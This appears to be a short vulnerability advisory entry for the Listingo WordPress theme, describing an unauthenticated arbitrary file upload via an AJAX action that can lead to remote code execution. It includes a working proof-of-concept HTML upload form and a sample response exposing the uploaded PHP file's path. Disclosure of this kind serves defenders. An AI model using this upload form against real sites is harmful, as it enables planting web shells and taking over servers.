The theme does not validate files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files and lead to RCE
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Listingo Unauthenticated File Upload</title> </head> <body> <form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data"> Upload a File: <input type="file" name="listingo_uploader" id="listingo_uploader"> <input type="submit" name="submit" value="Start Upload"> </form> </body> </html> The response give the path to the file uploaded: {"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}
UPLOAD
Fioravante Souza
Fioravante Souza
Yes
2022-11-21 (about 6 months ago)
2022-11-21 (about 6 months ago)
2022-12-12 (about 5 months ago)